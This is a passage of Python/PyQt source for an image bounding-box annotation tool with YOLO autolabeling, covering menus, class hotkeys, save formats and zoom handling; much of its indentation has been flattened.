# Create and add a widget for showing classes that you can select
self.classListWidget = QListWidget()
self.classListWidget.itemDoubleClicked.connect(self.classitemDoubleClicked)
classlistLayout = QVBoxLayout()
classlistLayout.setContentsMargins(0, 0,0, 0)
classlistLayout.addWidget(self.classListWidget)
classListContainer = QWidget()
classListContainer.setLayout(classlistLayout)
self.classdock = QDockWidget(u'List of classes', self)
self.classdock.setObjectName(u'classes')
self.classdock.setWidget(classListContainer)
self.zoomWidget = ZoomWidget()
self.colorDialog = ColorDialog(parent=self)
self.canvas = Canvas(parent=self)
self.canvas.zoomRequest.connect(self.zoomRequest)
scroll = QScrollArea()
scroll.setWidget(self.canvas)
scroll.setWidgetResizable(True)
self.scrollBars = {
Qt.Vertical: scroll.verticalScrollBar(),
Qt.Horizontal: scroll.horizontalScrollBar()
}
self.scrollArea = scroll
self.canvas.scrollRequest.connect(self.scrollRequest)
self.canvas.newShape.connect(self.newShape)
self.canvas.shapeMoved.connect(self.setDirty)
self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)
self.setCentralWidget(scroll)
self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
# Tzutalin 20160906 : Add file list and dock to move faster
self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
self.filedock.setFeatures(QDockWidget.DockWidgetFloatable)
self.addDockWidget(Qt.RightDockWidgetArea, self.classdock)
self.classdock.setFeatures(QDockWidget.DockWidgetFloatable)
self.addDockWidget(Qt.RightDockWidgetArea, self.yolodock)
self.yolodock.setFeatures(QDockWidget.DockWidgetFloatable)
self.dockFeatures = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetFloatable
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
# Actions
action = partial(newAction, self)
quit = action('&Quit', self.close,
'Ctrl+Q', 'quit', u'Quit application')
open = action('&Open', self.openFile,
'Ctrl+O', 'open', u'Open image or label file')
opendir = action('&Open Dir', self.openDirDialog,
'Ctrl+u', 'open', u'Open Dir')
changeSavedir = action('&Change Save Dir', self.changeSavedirDialog,
'Ctrl+r', 'open', u'Change default saved Annotation dir')
openAnnotation = action('&Open Annotation', self.openAnnotationDialog,
'Ctrl+Shift+O', 'open', u'Open Annotation')
openNextImg = action('&Next Image', self.openNextImg,
'd', 'next', u'Open Next')
openPrevImg = action('&Prev Image', self.openPrevImg,
'a', 'prev', u'Open Prev')
nextBox = action('&Next Box', self.nextBox,
'n','next', u'Next Box')
backBox = action('&Back Box', self.backBox,
'b','prev', u'Back Box')
verify = action('&Verify Image', self.verifyImg,
'space', 'verify', u'Verify Image')
save = action('&Save', self.saveFile,
'Ctrl+S', 'save', u'Save labels to file', enabled=False)
save_format = action('&PascalVOC', self.change_format,
'Ctrl+', 'format_voc', u'Change save format', enabled=True)
saveAs = action('&Save As', self.saveFileAs,
'Ctrl+Shift+S', 'save-as', u'Save labels to a different file', enabled=False)
close = action('&Close', self.closeFile, 'Ctrl+W', 'close', u'Close current file')
resetAll = action('&ResetAll', self.resetAll, None, 'resetall', u'Reset all')
color1 = action('Box Line Color', self.chooseColor1,
'Ctrl+L', 'color_line', u'Choose Box line color')
createMode = action('Create\nRectBox', self.setCreateMode,
'w', 'new', u'Start drawing Boxs', enabled=False)
editMode = action('&Edit\nRectBox', self.setEditMode,
'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)
create = action('Create\nRectBox', self.createShape,
'w', 'new', u'Draw a new Box', enabled=False)
delete = action('Delete\nRectBox', self.deleteSelectedShape,
'Delete', 'delete', u'Delete', enabled=False)
copy = action('&Duplicate\nRectBox', self.copySelectedShape,
'Ctrl+D', 'copy', u'Create a duplicate of the selected Box',
enabled=False)
advancedMode = action('&Advanced Mode', self.toggleAdvancedMode,
'Ctrl+Shift+A', 'expert', u'Switch to advanced mode',
checkable=True)
hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
'Ctrl+H', 'hide', u'Hide all Boxs',
enabled=False)
showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
'Ctrl+A', 'hide', u'Show all Boxs',
enabled=False)
help = action('&Tutorial', self.showTutorialDialog, None, 'help', u'Show demos')
showInfo = action('&Information', self.showInfoDialog, None, 'help', u'Information')
zoom = QWidgetAction(self)
zoom.setDefaultWidget(self.zoomWidget)
self.zoomWidget.setWhatsThis(
u"Zoom in or out of the image. Also accessible with"
" %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
fmtShortcut("Ctrl+Wheel")))
self.zoomWidget.setEnabled(False)
zoomIn = action('Zoom &In', partial(self.addZoom, 10),
'Ctrl++', 'zoom-in', u'Increase zoom level', enabled=False)
zoomOut = action('&Zoom Out', partial(self.addZoom, -10),
'Ctrl+-', 'zoom-out', u'Decrease zoom level', enabled=False)
zoomOrg = action('&Original size', partial(self.setZoom, 100),
'Ctrl+=', 'zoom', u'Zoom to original size', enabled=False)
fitWindow = action('&Fit Window', self.setFitWindow,
'Ctrl+F', 'fit-window', u'Zoom follows window size',
checkable=True, enabled=False)
fitWidth = action('Fit &Width', self.setFitWidth,
'Ctrl+Shift+F', 'fit-width', u'Zoom follows window width',
checkable=True, enabled=False)
# Group zoom controls into a list for easier toggling.
zoomActions = (self.zoomWidget, zoomIn, zoomOut,
zoomOrg, fitWindow, fitWidth)
self.zoomMode = self.MANUAL_ZOOM
self.scalers = {
self.FIT_WINDOW: self.scaleFitWindow,
self.FIT_WIDTH: self.scaleFitWidth,
# Set to one to scale to 100% when loading files.
self.MANUAL_ZOOM: lambda: 1,
}
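        # Rough sketch of what the fit scalers compute: fit-window scales by
        # the limiting axis, ~ min(w1 / w2, h1 / h2) for viewport (w1, h1)
        # and image (w2, h2); fit-width is simply w1 / w2.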
edit = action('&Edit Label', self.editLabel,
'Ctrl+E', 'edit', u'Modify the label of the selected Box',
enabled=False)
self.editButton.setDefaultAction(edit)
        # Parameters for yolo
autolabel = action('&Autolabel Dir', self.autolabeldir, None, 'autolabel', u'Show demos')
yoloimgdir = action('Set yolo images path', self.setYoloImgDir, None, 'Set yolo images path', u'Set yolo images path')
yoloresdir = action('Set yolo results path', self.setYoloResDir, None, 'Set yolo results path', u'Set yolo results path')
yoloconfig = action('Set yolo config path', self.setYoloConfig, None, 'Set yolo config path', u'Set yolo config path')
yoloweights = action('Set yolo weights path', self.setYoloWeights, None, 'Set yolo weights path', u'Set yolo weights path')
        yolothres = action('Set yolo threshold', self.setYoloThreshold, None, 'Set yolo threshold', u'Set yolo threshold')
# Hot keys for class assignments
instantedit = action('set class 0', self.mediator0, '0','nnnn', u'Next Box')
instantedit1 = action('set class 1', self.mediator1, '1','nnnn', u'Next Box')
instantedit2 = action('set class 2', self.mediator2, '2','nnnn', u'Next Box')
instantedit3 = action('set class 3', self.mediator3, '3','nnnn', u'Next Box')
instantedit4 = action('set class 4', self.mediator4, '4','nnnn', u'Next Box')
instantedit5 = action('set class 5', self.mediator5, '5','nnnn', u'Next Box')
instantedit6 = action('set class 6', self.mediator6, '6','nnnn', u'Next Box')
instantedit7 = action('set class 7', self.mediator7, '7','nnnn', u'Next Box')
instantedit8 = action('set class 8', self.mediator8, '8','nnnn', u'Next Box')
instantedit9 = action('set class 9', self.mediator9, '9','nnnn', u'Next Box')
shapeLineColor = action('Shape &Line Color', self.chshapeLineColor,
icon='color_line', tip=u'Change the line color for this specific shape',
enabled=False)
shapeFillColor = action('Shape &Fill Color', self.chshapeFillColor,
icon='color', tip=u'Change the fill color for this specific shape',
enabled=False)
labels = self.dock.toggleViewAction()
labels.setText('Show/Hide Label Panel')
labels.setShortcut('Ctrl+Shift+L')
        # Label list context menu.
labelMenu = QMenu()
addActions(labelMenu, (edit, delete))
self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
self.labelList.customContextMenuRequested.connect(
self.popLabelListMenu)
# Store actions for further handling.
self.actions = struct(save=save, save_format=save_format, saveAs=saveAs, open=open, close=close, resetAll = resetAll,
lineColor=color1, create=create, delete=delete, edit=edit, copy=copy, nextBox=nextBox, backBox=backBox,
createMode=createMode, editMode=editMode, advancedMode=advancedMode,
shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
fitWindow=fitWindow, fitWidth=fitWidth,
zoomActions=zoomActions,
fileMenuActions=(
open, opendir, save, saveAs, close, resetAll, quit),
beginner=(), advanced=(),
editMenu=(edit, copy, delete, nextBox, backBox,
None, color1),
beginnerContext=(create, edit, copy, delete, nextBox, backBox),
advancedContext=(createMode, editMode, edit, copy,
delete, shapeLineColor, shapeFillColor,nextBox, backBox ),
onLoadActive=(
close, create, createMode, editMode),
onShapesPresent=(saveAs, hideAll, showAll))
self.menus = struct(
file=self.menu('&File'),
edit=self.menu('&Edit'),
view=self.menu('&View'),
help=self.menu('&Help'),
instantedit=self.menu('&InstantEdit'),
autolabeling=self.menu('&Autolabeling'),
recentFiles=QMenu('Open &Recent'),
labelList=labelMenu)
        # Auto saving: enable auto saving when pressing next
self.autoSaving = QAction("Auto Saving", self)
self.autoSaving.setCheckable(True)
self.autoSaving.setChecked(settings.get(SETTING_AUTO_SAVE, False))
# Sync single class mode from PR#106
self.singleClassMode = QAction("Single Class Mode", self)
self.singleClassMode.setShortcut("Ctrl+Shift+S")
self.singleClassMode.setCheckable(True)
self.singleClassMode.setChecked(settings.get(SETTING_SINGLE_CLASS, False))
self.lastLabel = None
# Add option to enable/disable labels being painted at the top of bounding boxes
self.paintLabelsOption = QAction("Paint Labels", self)
self.paintLabelsOption.setShortcut("Ctrl+Shift+P")
self.paintLabelsOption.setCheckable(True)
self.paintLabelsOption.setChecked(settings.get(SETTING_PAINT_LABEL, False))
self.paintLabelsOption.triggered.connect(self.togglePaintLabelsOption)
addActions(self.menus.file,
(open, opendir, changeSavedir, openAnnotation, self.menus.recentFiles, save, save_format, saveAs, close, resetAll, quit))
addActions(self.menus.help, (help, showInfo))
addActions(self.menus.view, (
self.autoSaving,
self.singleClassMode,
self.paintLabelsOption,
labels, advancedMode, None,
hideAll, showAll, None,
zoomIn, zoomOut, zoomOrg, None,
fitWindow, fitWidth))
addActions(self.menus.instantedit, (
            instantedit, instantedit1, instantedit2, instantedit3, instantedit4, instantedit5,
instantedit6, instantedit7, instantedit8, instantedit9))
addActions(self.menus.autolabeling, (
yoloimgdir, yoloresdir, yoloconfig, yoloweights,yolothres, autolabel))
self.menus.file.aboutToShow.connect(self.updateFileMenu)
# Custom context menu for the canvas widget:
addActions(self.canvas.menus[0], self.actions.beginnerContext)
addActions(self.canvas.menus[1], (
action('&Copy here', self.copyShape),
action('&Move here', self.moveShape)))
self.tools = self.toolbar('Tools')
self.actions.beginner = (
open, opendir, changeSavedir, openNextImg, openPrevImg,nextBox,backBox,
verify, save, save_format, None, create, copy, delete, None,
zoomIn, zoom, zoomOut, fitWindow, fitWidth)
self.actions.advanced = (
open, opendir, changeSavedir, openNextImg,openPrevImg,nextBox,backBox,
save, save_format, None,
createMode, editMode, None,
hideAll, showAll)
self.statusBar().showMessage('%s started.' % __appname__)
self.statusBar().show()
# Application state.
self.image = QImage()
self.filePath = ustr(defaultFilename)
self.recentFiles = []
self.maxRecent = 7
self.lineColor = None
self.fillColor = None
self.zoom_level = 100
self.fit_window = False
# Add Chris
self.difficult = False
        # Fix the compatibility issue between qt4 and qt5: convert the
        # QStringList to a python list.
        if settings.get(SETTING_RECENT_FILES):
            if have_qstring():
                recentFileQStringList = settings.get(SETTING_RECENT_FILES)
                self.recentFiles = [ustr(i) for i in recentFileQStringList]
            else:
                self.recentFiles = settings.get(SETTING_RECENT_FILES)
size = settings.get(SETTING_WIN_SIZE, QSize(600, 500))
position = settings.get(SETTING_WIN_POSE, QPoint(0, 0))
self.resize(size)
self.move(position)
saveDir = ustr(settings.get(SETTING_SAVE_DIR, None))
self.lastOpenDir = ustr(settings.get(SETTING_LAST_OPEN_DIR, None))
if self.defaultSaveDir is None and saveDir is not None and os.path.exists(saveDir):
self.defaultSaveDir = saveDir
self.statusBar().showMessage('%s started. Annotation will be saved to %s' %
(__appname__, self.defaultSaveDir))
self.statusBar().show()
self.restoreState(settings.get(SETTING_WIN_STATE, QByteArray()))
Shape.line_color = self.lineColor = QColor(settings.get(SETTING_LINE_COLOR, DEFAULT_LINE_COLOR))
Shape.fill_color = self.fillColor = QColor(settings.get(SETTING_FILL_COLOR, DEFAULT_FILL_COLOR))
self.canvas.setDrawingColor(self.lineColor)
# Add chris
Shape.difficult = self.difficult
def xbool(x):
if isinstance(x, QVariant):
return x.toBool()
return bool(x)
if xbool(settings.get(SETTING_ADVANCE_MODE, False)):
self.actions.advancedMode.setChecked(True)
self.toggleAdvancedMode()
# Populate the File menu dynamically.
self.updateFileMenu()
# Since loading the file may take some time, make sure it runs in the background.
if self.filePath and os.path.isdir(self.filePath):
self.queueEvent(partial(self.importDirImages, self.filePath or ""))
elif self.filePath:
self.queueEvent(partial(self.loadFile, self.filePath or ""))
# Callbacks:
self.zoomWidget.valueChanged.connect(self.paintCanvas)
self.populateModeActions()
# Display cursor coordinates at the right of status bar
self.labelCoordinates = QLabel('')
self.statusBar().addPermanentWidget(self.labelCoordinates)
        # Open dir if the default file path is a directory
if self.filePath and os.path.isdir(self.filePath):
self.openDirDialog(dirpath=self.filePath)
        if not tensor_flow_is_present:
            warning = QMessageBox.warning(self, 'warning',
                                          "At least one module from the list: cv2, tensorflow, keras "
                                          "is absent. Autolabeling feature is disabled", QMessageBox.Ok)
self.setClasses()
## Support Functions ##
def set_format(self, save_format):
if save_format == FORMAT_PASCALVOC:
self.actions.save_format.setText(FORMAT_PASCALVOC)
self.actions.save_format.setIcon(newIcon("format_voc"))
self.usingPascalVocFormat = True
self.usingYoloFormat = False
LabelFile.suffix = XML_EXT
elif save_format == FORMAT_YOLO:
self.actions.save_format.setText(FORMAT_YOLO)
self.actions.save_format.setIcon(newIcon("format_yolo"))
self.usingPascalVocFormat = False
self.usingYoloFormat = True
LabelFile.suffix = TXT_EXT
def change_format(self):
if self.usingPascalVocFormat: self.set_format(FORMAT_YOLO)
elif self.usingYoloFormat: self.set_format(FORMAT_PASCALVOC)
def noShapes(self):
return not self.itemsToShapes
def toggleAdvancedMode(self, value=True):
self._beginner = not value
self.canvas.setEditing(True)
self.populateModeActions()
self.editButton.setVisible(not value)
if value:
self.actions.createMode.setEnabled(True)
self.actions.editMode.setEnabled(False)
self.dock.setFeatures(self.dock.features() | self.dockFeatures)
else:
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
def populateModeActions(self):
if self.beginner():
tool, menu = self.actions.beginner, self.actions.beginnerContext
else:
tool, menu = self.actions.advanced, self.actions.advancedContext
self.tools.clear()
addActions(self.tools, tool)
self.canvas.menus[0].clear()
addActions(self.canvas.menus[0], menu)
self.menus.edit.clear()
actions = (self.actions.create,) if self.beginner()\
else (self.actions.createMode, self.actions.editMode)
addActions(self.menus.edit, actions + self.actions.editMenu)
def setBeginner(self):
self.tools.clear()
addActions(self.tools, self.actions.beginner)
def setAdvanced(self):
self.tools.clear()
addActions(self.tools, self.actions.advanced)
def setDirty(self):
self.dirty = True
self.actions.save.setEnabled(True)
def setClean(self):
self.dirty = False
self.actions.save.setEnabled(False)
self.actions.create.setEnabled(True)
def toggleActions(self, value=True):
"""Enable/Disable widgets which depend on an opened image."""
for z in self.actions.zoomActions:
z.setEnabled(value)
for action in self.actions.onLoadActive:
action.setEnabled(value)
def queueEvent(self, function):
QTimer.singleShot(0, function)
def status(self, message, delay=5000):
self.statusBar().showMessage(message, delay)
def resetState(self):
self.itemsToShapes.clear()
self.shapesToItems.clear()
self.labelList.clear()
self.filePath = None
self.imageData = None
self.labelFile = None
self.canvas.resetState()
self.labelCoordinates.clear()
def currentItem(self):
items = self.labelList.selectedItems()
if items:
return items[0]
return None
def addRecentFile(self, filePath):
if filePath in self.recentFiles:
self.recentFiles.remove(filePath)
elif len(self.recentFiles) >= self.maxRecent:
self.recentFiles.pop()
self.recentFiles.insert(0, filePath)
def beginner(self):
return self._beginner
def advanced(self):
return not self.beginner()
def getAvailableScreencastViewer(self):
osName = platform.system()
if osName == 'Windows':
return ['C:\\Program Files\\Internet Explorer\\iexplore.exe']
elif osName == 'Linux':
return ['xdg-open']
elif osName == 'Darwin':
return ['open', '-a', 'Safari']
## Callbacks ##
def showTutorialDialog(self):
subprocess.Popen(self.screencastViewer + [self.screencast])
def showInfoDialog(self):
msg = u'Name:{0} \nApp Version:{1} \n{2} '.format(__appname__, __version__, sys.version_info)
QMessageBox.information(self, u'Information', msg)
def autolabeldir(self):
if (tensor_flow_is_present):
self.open_new_dialog()
self.thr1 = threading.Thread(target=new_predictor.labeling, name = 'new_predictor', args=(self.yolo_img_path, self.yolo_res_path, self.yolo_config_path, self.yolo_weights_path, self.yolo_thres, self.progBar))
self.thr1.start()
else:
            warning = QMessageBox.warning(self, 'warning',
                                          "At least one module from the list: cv2, tensorflow, keras "
                                          "is absent. Autolabeling feature is disabled", QMessageBox.Ok)
def open_new_dialog(self):
self.progBar = ProgressBar()
self.progBar.show()
def yoloConfRefresh(self):
if (tensor_flow_is_present):
self.yoloListWidget.clear()
item = QListWidgetItem("yolo_img_path: " + self.yoloConfList[0])
self.yoloListWidget.addItem(item)
item = QListWidgetItem("yolo_res_path: " + self.yoloConfList[1])
self.yoloListWidget.addItem(item)
item = QListWidgetItem("yolo_config_path: " + self.yoloConfList[2])
self.yoloListWidget.addItem(item)
item = QListWidgetItem("yolo_weights_path: " + self.yoloConfList[3])
self.yoloListWidget.addItem(item)
            item = QListWidgetItem("threshold: " + str(self.yoloConfList[4]))
            self.yoloListWidget.addItem(item)
else:
self.yoloListWidget.clear()
item = QListWidgetItem("The autolabeling feature is disabled")
self.yoloListWidget.addItem(item)
def setYoloImgDir(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
self.yolo_img_path = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
self.yoloConfList[0]=self.yolo_img_path
self.yoloConfRefresh()
def setYoloResDir(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
self.yolo_res_path = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
self.yoloConfList[1]=self.yolo_res_path
self.yoloConfRefresh()
def setClasses(self):
if (os.path.exists(self.yolo_config_path)):
with open(self.yolo_config_path) as config_buffer:
config = json.loads(config_buffer.read())
self.labelHist = config['model']['labels']
            self.classListWidget.clear()
            for index, classname in enumerate(self.labelHist):
                # Keep the "index: name" format; classitemDoubleClicked()
                # parses the text after the first space.
                item = QListWidgetItem("%d: %s" % (index, classname))
                self.classListWidget.addItem(item)
self.yoloConfList[2] = self.yolo_config_path
self.yoloConfRefresh()
    def setYoloConfig(self, _value=False, dirpath=None):
        if not self.mayContinue():
            return
        self.yolo_config_path = QFileDialog.getOpenFileName(self, 'Open file', '/home')[0]
        self.setClasses()
    def setYoloWeights(self, _value=False, dirpath=None):
        if not self.mayContinue():
            return
        self.yolo_weights_path = QFileDialog.getOpenFileName(self, 'Open file', '/home')[0]
        self.yoloConfList[3] = self.yolo_weights_path
        self.yoloConfRefresh()
    def setYoloThreshold(self):
        text, ok = QInputDialog.getText(self, 'Input Dialog',
                                        'Enter threshold:')
        if ok:
            try:
                value = float(text)
            except ValueError:
                return
            # Only accept thresholds in [0, 1]; keep the old value otherwise.
            if 0 <= value <= 1:
                self.yolo_thres = value
                self.yoloConfList[4] = self.yolo_thres
                self.yoloConfRefresh()
def createShape(self):
assert self.beginner()
self.canvas.setEditing(False)
self.actions.create.setEnabled(False)
def toggleDrawingSensitive(self, drawing=True):
"""In the middle of drawing, toggling between modes should be disabled."""
self.actions.editMode.setEnabled(not drawing)
if not drawing and self.beginner():
# Cancel creation.
print('Cancel creation.')
self.canvas.setEditing(True)
self.canvas.restoreCursor()
self.actions.create.setEnabled(True)
def toggleDrawMode(self, edit=True):
self.canvas.setEditing(edit)
self.actions.createMode.setEnabled(edit)
self.actions.editMode.setEnabled(not edit)
def setCreateMode(self):
assert self.advanced()
self.toggleDrawMode(False)
def setEditMode(self):
assert self.advanced()
self.toggleDrawMode(True)
self.labelSelectionChanged()
def updateFileMenu(self):
currFilePath = self.filePath
def exists(filename):
return os.path.exists(filename)
menu = self.menus.recentFiles
menu.clear()
files = [f for f in self.recentFiles if f !=
currFilePath and exists(f)]
for i, f in enumerate(files):
icon = newIcon('labels')
action = QAction(
icon, '&%d %s' % (i + 1, QFileInfo(f).fileName()), self)
action.triggered.connect(partial(self.loadRecent, f))
menu.addAction(action)
def popLabelListMenu(self, point):
self.menus.labelList.exec_(self.labelList.mapToGlobal(point))
def editLabel(self):
if not self.canvas.editing():
return
item = self.currentItem()
text = self.labelDialog.popUp(item.text())
if text is not None:
item.setText(text)
item.setBackground(generateColorByText(text))
self.setDirty()
def mediator0(self):
self.InstanteditLabel(0)
def mediator1(self):
self.InstanteditLabel(1)
def mediator2(self):
self.InstanteditLabel(2)
def mediator3(self):
self.InstanteditLabel(3)
def mediator4(self):
self.InstanteditLabel(4)
def mediator5(self):
self.InstanteditLabel(5)
def mediator6(self):
self.InstanteditLabel(6)
def mediator7(self):
self.InstanteditLabel(7)
def mediator8(self):
self.InstanteditLabel(8)
def mediator9(self):
self.InstanteditLabel(9)
    def InstanteditLabel(self, number):
        if self.canvas.selectedShape:
            if not self.canvas.editing():
                return
            if number > len(self.labelHist) - 1:
                return
            item = self.currentItem()
            text = self.labelHist[number]
            if text is not None:
                item.setText(text)
                item.setBackground(generateColorByText(text))
                self.setDirty()
# Tzutalin 20160906 : Add file list and dock to move faster
def fileitemDoubleClicked(self, item=None):
currIndex = self.mImgList.index(ustr(item.text()))
if currIndex < len(self.mImgList):
filename = self.mImgList[currIndex]
if filename:
self.loadFile(filename)
def classitemDoubleClicked(self, item=None):
currText = ustr(item.text())[ustr(item.text()).find(' ')+1:]
currIndex = self.labelHist.index(currText)
if currIndex < len(self.labelHist):
classname = self.labelHist[currIndex]
if classname:
self.InstanteditLabel(currIndex)
# Add chris
    def btnstate(self, item=None):
        """Handle the 'difficult' flag; update it on the current shape."""
        if not self.canvas.editing():
            return
        item = self.currentItem()
        if not item:  # If no item is selected, take the last one.
            item = self.labelList.item(self.labelList.count() - 1)
        difficult = self.diffcButton.isChecked()
        try:
            shape = self.itemsToShapes[item]
        except KeyError:
            # No shape is associated with the item (e.g. the list is empty).
            return
        # Checked and update.
        if difficult != shape.difficult:
            shape.difficult = difficult
            self.setDirty()
        else:  # User probably changed item visibility
            self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
# React to canvas signals.
def shapeSelectionChanged(self, selected=False):
if self._noSelectionSlot:
self._noSelectionSlot = False
else:
shape = self.canvas.selectedShape
if shape:
self.shapesToItems[shape].setSelected(True)
else:
self.labelList.clearSelection()
self.actions.delete.setEnabled(selected)
self.actions.copy.setEnabled(selected)
self.actions.edit.setEnabled(selected)
self.actions.shapeLineColor.setEnabled(selected)
self.actions.shapeFillColor.setEnabled(selected)
def addLabel(self, shape):
shape.paintLabel = self.paintLabelsOption.isChecked()
item = HashableQListWidgetItem(shape.label)
item.setFlags(item.flags() | Qt.ItemIsUserCheckable)
item.setCheckState(Qt.Checked)
item.setBackground(generateColorByText(shape.label))
self.itemsToShapes[item] = shape
self.shapesToItems[shape] = item
self.labelList.addItem(item)
for action in self.actions.onShapesPresent:
action.setEnabled(True)
def remLabel(self, shape):
if shape is None:
# print('rm empty label')
return
item = self.shapesToItems[shape]
self.labelList.takeItem(self.labelList.row(item))
del self.shapesToItems[shape]
del self.itemsToShapes[item]
def loadLabels(self, shapes):
s = []
for label, points, line_color, fill_color, difficult in shapes:
shape = Shape(label=label)
for x, y in points:
shape.addPoint(QPointF(x, y))
shape.difficult = difficult
shape.close()
s.append(shape)
if line_color:
shape.line_color = QColor(*line_color)
else:
shape.line_color = generateColorByText(label)
if fill_color:
shape.fill_color = QColor(*fill_color)
else:
shape.fill_color = generateColorByText(label)
self.addLabel(shape)
self.canvas.loadShapes(s)
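    # Each entry in `shapes` above is a 5-tuple: (label, points, line_color,
    # fill_color, difficult), with points as [(x, y), ...] -- e.g. a unit box:
    #     ('dock', [(0, 0), (1, 0), (1, 1), (0, 1)], None, None, False)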
def saveLabels(self, annotationFilePath):
annotationFilePath = ustr(annotationFilePath)
if self.labelFile is None:
self.labelFile = LabelFile()
self.labelFile.verified = self.canvas.verified
def format_shape(s):
return dict(label=s.label,
line_color=s.line_color.getRgb(),
fill_color=s.fill_color.getRgb(),
points=[(p.x(), p.y()) for p in s.points],
# add chris
difficult = s.difficult)
shapes = [format_shape(shape) for shape in self.canvas.shapes]
# Can add different annotation formats here
try:
if self.usingPascalVocFormat is True:
if ustr(annotationFilePath[-4:]) != ".xml":
annotationFilePath += XML_EXT
print ('Img: ' + self.filePath + ' -> Its xml: ' + annotationFilePath)
self.labelFile.savePascalVocFormat(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
elif self.usingYoloFormat is True:
if annotationFilePath[-4:] != ".txt":
annotationFilePath += TXT_EXT
print ('Img: ' + self.filePath + ' -> Its txt: ' + annotationFilePath)
self.labelFile.saveYoloFormat(annotationFilePath, shapes, self.filePath, self.imageData, self.labelHist,
self.lineColor.getRgb(), self.fillColor.getRgb())
else:
self.labelFile.save(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
return True
except LabelFileError as e:
self.errorMessage(u'Error saving label data', u'<b>%s</b>' % e)
return False
def copySelectedShape(self):
self.addLabel(self.canvas.copySelectedShape())
# fix copy and delete
self.shapeSelectionChanged(True)
def labelSelectionChanged(self):
item = self.currentItem()
if item and self.canvas.editing():
self._noSelectionSlot = True
self.canvas.selectShape(self.itemsToShapes[item])
shape = self.itemsToShapes[item]
# Add Chris
self.diffcButton.setChecked(shape.difficult)
def labelItemChanged(self, item):
shape = self.itemsToShapes[item]
label = item.text()
if label != shape.label:
shape.label = item.text()
shape.line_color = generateColorByText(shape.label)
self.setDirty()
else: # User probably changed item visibility
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
# Callback functions:
def newShape(self):
"""Pop-up and give focus to the label editor.
position MUST be in global coordinates.
"""
if not self.useDefaultLabelCheckbox.isChecked() or not self.defaultLabelTextLine.text():
if len(self.labelHist) > 0:
self.labelDialog = LabelDialog(
parent=self, listItem=self.labelHist)
# Sync single class mode from PR#106
if self.singleClassMode.isChecked() and self.lastLabel:
text = self.lastLabel
else:
text = self.labelDialog.popUp(text=self.prevLabelText)
self.lastLabel = text
else:
text = self.defaultLabelTextLine.text()
# Add Chris
self.diffcButton.setChecked(False)
if text is not None:
self.prevLabelText = text
generate_color = generateColorByText(text)
shape = self.canvas.setLastLabel(text, generate_color, generate_color)
self.addLabel(shape)
if self.beginner(): # Switch to edit mode.
self.canvas.setEditing(True)
self.actions.create.setEnabled(True)
else:
self.actions.editMode.setEnabled(True)
self.setDirty()
if text not in self.labelHist:
self.labelHist.append(text)
else:
# self.canvas.undoLastLine()
self.canvas.resetAllLines()
def scrollRequest(self, delta, orientation):
units = - delta / (8 * 15)
bar = self.scrollBars[orientation]
bar.setValue(bar.value() + bar.singleStep() * units)
def setZoom(self, value):
self.actions.fitWidth.setChecked(False)
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.MANUAL_ZOOM
self.zoomWidget.setValue(value)
def addZoom(self, increment=10):
self.setZoom(self.zoomWidget.value() + increment)
def zoomRequest(self, delta):
# get the current scrollbar positions
# calculate the percentages ~ coordinates
h_bar = self.scrollBars[Qt.Horizontal]
v_bar = self.scrollBars[Qt.Vertical]
# get the current maximum, to know the difference after zooming
h_bar_max = h_bar.maximum()
v_bar_max = v_bar.maximum()
# get the cursor position and canvas size
# calculate the desired movement from 0 to 1
# where 0 = move left
# 1 = move right
# up and down analogous
cursor = QCursor()
pos = cursor.pos()
relative_pos = QWidget.mapFromGlobal(self, pos)
cursor_x = relative_pos.x()
cursor_y = relative_pos.y()
w = self.scrollArea.width()
h = self.scrollArea.height()
# the scaling from 0 to 1 has some padding
# you don't have to hit the very leftmost pixel for a maximum-left movement
margin = 0.1
move_x = (cursor_x - margin * w) / (w - 2 * margin * w)
move_y = (cursor_y - margin * h) / (h - 2 * margin * h)
# clamp the values from 0 to 1
move_x = min(max(move_x, 0), 1)
move_y = min(max(move_y, 0), 1)
# zoom in
units = delta / (8 * 15)
scale = 10
self.addZoom(scale * units)
# get the difference in scrollbar values
# this is how far we can move
d_h_bar_max = h_bar.maximum() - h_bar_max
d_v_bar_max = v_bar.maximum() - v_bar_max
# get the new scrollbar values
new_h_bar_value = h_bar.value() + move_x * d_h_bar_max
new_v_bar_value = v_bar.value() + move_y * d_v_bar_max
h_bar.setValue(new_h_bar_value)
v_bar.setValue(new_v_bar_value)
def setFitWindow(self, value=True):
if value:
self.actions.fitWidth.setChecked(False)
self.zoomMode = self.FIT_WINDOW if value else self.MANUAL_ZOOM
self.adjustScale()
def setFitWidth(self, value=True):
if value:
